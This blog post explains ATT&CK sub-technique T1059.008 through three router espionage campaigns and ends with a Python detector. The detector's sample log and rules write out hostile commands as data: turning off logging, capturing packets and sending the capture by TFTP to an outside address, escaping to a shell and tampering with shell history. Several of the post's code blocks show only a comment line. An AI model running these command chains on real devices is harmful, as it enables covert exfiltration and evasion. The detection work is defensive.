T1059.008 Network Device CLI in MITRE ATT&CK Explained
March 12, 2026
What Is T1059.008 Network Device CLI in MITRE ATT&CK?
T1059.008 Network Device CLI is a sub-technique of Command and Scripting Interpreter (T1059) in the MITRE ATT&CK framework, under the Execution tactic. It refers to the use of command-line interfaces (CLIs) on network devices to execute commands and manage device functionality.
Network device CLIs are commonly used by administrators to configure, monitor, and maintain infrastructure components such as routers, switches, firewalls, and other network appliances. Access is typically achieved through a terminal emulator connecting to the device’s IP address using authenticated credentials. Once logged in, users can issue device-specific commands to view system status, modify configurations, inspect traffic statistics, or manage network services.
To read about other sub-techniques of the T1059 Command and Scripting Interpreter technique, you can visit the related hub blog.
Adversary Use of T1059.008 Network Device CLI
Adversaries use T1059.008 Network Device CLI to execute malicious commands on network devices by abusing legitimate administrative interfaces. After gaining access through compromised credentials, exposed management services, or misconfigured authentication mechanisms, attackers can interact directly with the device’s CLI.
In attack campaigns, adversaries leverage network device CLIs to alter configurations, disable security controls, create unauthorized accounts, establish persistence, or redirect network traffic. Because these actions are performed through native management interfaces, they may bypass endpoint-focused security controls and remain undetected in environments where network device activity is insufficiently logged or monitored.
Procedure Examples Used by Adversaries in Red Report 2026
The network device command line interface (CLI) is a common focal point for adversaries seeking to manipulate the functionality of network devices.
For instance, beginning in March 2025, security researchers reported on the China-nexus espionage group UNC3886 deploying custom backdoors (including TINYSHELL variants) on Juniper Networks Junos OS routers [1]. This campaign showcases deep knowledge of network device internals.
The malicious TTPs rely heavily on the Junos OS shell mode, an underlying FreeBSD shell accessible from the Junos CLI, to bypass security features and deploy rootkit-like malware for long-term persistence and covert espionage.
Below is a technical explanation of how UNC3886 leverages network device command line interfaces.
Persistence and Stealth via Shell Commands
The primary adversarial goal is to gain highly privileged access to the underlying operating system shell, which is then used to subvert the device's integrity control mechanism (Veriexec) and deploy the backdoor.
The threat actor must first gain shell access (usually through compromised management credentials or a terminal server) from the standard Junos CLI. Once in the shell, they use standard Unix-like commands to execute their malicious code, bypassing the operating system's integrity checks.
| Adversary Goal | Recovered Shell Command TTPs |
| --- | --- |
| Bypass Integrity Control | Inject malicious code into the memory of a trusted process to circumvent the Veriexec file integrity system. This is done using commands like cat, mkfifo, and dd to manipulate process memory. |
| Code Injection Setup | Create a named pipe (null) to hold a "hung" process (cat) for memory injection. |
| Anti-Forensics | Clear the user's history file to eliminate traces of the commands used during the compromise session. |
Clearing Shell History for Anti-Forensics
A critical anti-forensics step observed in the UNC3886 campaign is the immediate removal of command history to ensure that the initial stages of the exploit (which involve complex file and memory manipulation) are not recorded on the device's persistent storage.
The following commands, executed from the underlying FreeBSD shell mode, demonstrate how the adversary ensures their actions, including the initial memory injection, are immediately erased from the history logs.
```
# Sets the shell history file variable to an empty string.
```
By leveraging the underlying shell accessible through the Juniper CLI, the adversary moves from a network configuration state to an operating system exploitation state, enabling the deployment of persistent, low-level malware.
Procedure Examples Used by Adversaries in Red Report 2025
ArcaneDoor Campaign
In April 2024, researchers uncovered the "ArcaneDoor" campaign, where state-sponsored actors exploited vulnerabilities in Cisco Adaptive Security Appliances (ASA) and Firepower Threat Defense (FTD) software.
In this espionage-focused campaign, adversaries exploited the network device CLI (Command Line Interface) to manipulate and control compromised perimeter network devices. Using their custom malware, "Line Dancer," the attackers executed specific commands to modify configurations, exfiltrate data, and maintain stealth. By issuing commands like show configuration, they extracted detailed device configurations, enabling further reconnaissance and lateral movement. The attackers also disabled logging through CLI to avoid detection and conceal their activities. Additionally, they used the CLI to create and exfiltrate packet captures, providing insights into network traffic. Commands like write mem were employed to save malicious changes to the device's memory, ensuring persistence. These malicious actions leveraged the CLI's legitimate functionality to execute their espionage operations effectively.
```
# Display the current configuration of the device
```
These commands showcase how the attackers leveraged the CLI to perform reconnaissance, modify system behavior, and exfiltrate critical data while evading detection.
Procedure Examples Used by Adversaries in Red Report 2024
Adversaries commonly leverage Network Device CLIs for executing remote code and exfiltrating data, exploiting these interfaces as critical vectors for cyber attacks and network surveillance.
For instance, as disclosed in April 2023, Russian state-sponsored APT28 hackers have been deploying 'Jaguar Tooth,' a custom malware on Cisco IOS routers, which particularly exploits the CLI of these devices [2]. Once installed, this malware creates a process named 'Service Policy Lock' that executes a series of CLI commands, such as 'show running-config,' 'show version,' and several others, to collect detailed information about the router's configuration and network environment.
```
show running-config
```
This data is then exfiltrated using TFTP, enabling the hackers to gain extensive insight into the network infrastructure. This tactic exemplifies adversaries' strategic use of network device CLI for espionage and surveillance purposes, highlighting the criticality of securing network device interfaces against unauthorized access.
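The procedure examples above (ArcaneDoor, Jaguar Tooth, and the UNC3886 shell escape) share a recognisable command chain: dump the configuration, silence logging, capture or stage data, save the change, and push it out over TFTP. The following Python detector, added here as an illustration and not taken from the page or from any of the cited reports, applies those patterns to constructed command-accounting lines; the log format, device names, usernames and addresses are assumptions, and the history-file rule assumes the shell variable is named HISTFILE.

```python
import re
from collections import defaultdict

# Constructed sample accounting lines (not from the page). Real sources with the same
# fields: TACACS+ command accounting, Cisco IOS %PARSER-5-CFGLOG_LOGGEDCMD, Junos UI_CMDLINE_READ_LINE.
SAMPLE_LOG = """\
2025-03-12T08:01:10Z edge-rtr1 user=netops src=10.10.5.20 cmd=show interfaces
2025-03-12T08:01:55Z edge-rtr1 user=netops src=10.10.5.20 cmd=show ip bgp summary
2025-03-12T23:14:02Z edge-fw2 user=admin src=198.51.100.77 cmd=show running-config
2025-03-12T23:14:30Z edge-fw2 user=admin src=198.51.100.77 cmd=no logging host 10.10.9.9
2025-03-12T23:15:01Z edge-fw2 user=admin src=198.51.100.77 cmd=capture c1 interface outside
2025-03-12T23:16:40Z edge-fw2 user=admin src=198.51.100.77 cmd=copy /pcap capture:c1 tftp://198.51.100.77/c1.pcap
2025-03-12T23:17:05Z edge-fw2 user=admin src=198.51.100.77 cmd=write mem
2025-03-13T02:40:11Z core-jnp1 user=svc-mon src=203.0.113.5 cmd=start shell
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<dev>\S+) user=(?P<user>\S+) src=(?P<src>\S+) cmd=(?P<cmd>.+)$")

# One rule per behaviour the procedure examples describe.
RULES = {
    "config_dump":    re.compile(r"^show (running-config|startup-config|configuration)\b"),
    "logging_off":    re.compile(r"^no (logging|aaa accounting)\b"),
    "pcap":           re.compile(r"^(capture|monitor capture)\b"),
    "exfil_tftp":     re.compile(r"\btftp://"),
    "persist_save":   re.compile(r"^(write mem(ory)?|copy running-config startup-config)$"),
    "shell_escape":   re.compile(r"^start shell\b"),
    "history_tamper": re.compile(r"histfile", re.IGNORECASE),  # assumed variable name
}

def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def classify(cmd):
    """Return the rule names a single command matches, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]

def score_sessions(log_text, min_categories=2):
    """Group commands by (device, user, source IP) and flag sessions that hit
    several distinct categories, the chain seen in ArcaneDoor and Jaguar Tooth:
    dump config, silence logging, capture, save, exfiltrate."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            key = (rec["dev"], rec["user"], rec["src"])
            hits[key].update(classify(rec["cmd"]))
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_categories}
```

A single matching command (for example a routine show running-config by an operator) is not flagged on its own; the session is flagged only when several categories occur from the same device, user and source address, which keeps the rule useful on real accounting feeds.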
References
[1] “Ghost in the Router: China-Nexus Espionage Actor UNC3886 Targets Juniper Routers,” Google Cloud Blog, Mar. 12, 2025. Available: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers. [Accessed: Dec. 02, 2025]
[2] L. Abrams, “US, UK warn of govt hackers using custom malware on Cisco routers,” BleepingComputer, Apr. 18, 2023. Available: https://www.bleepingcomputer.com/news/security/us-uk-warn-of-govt-hackers-using-custom-malware-on-cisco-routers/. [Accessed: Dec. 21, 2023]
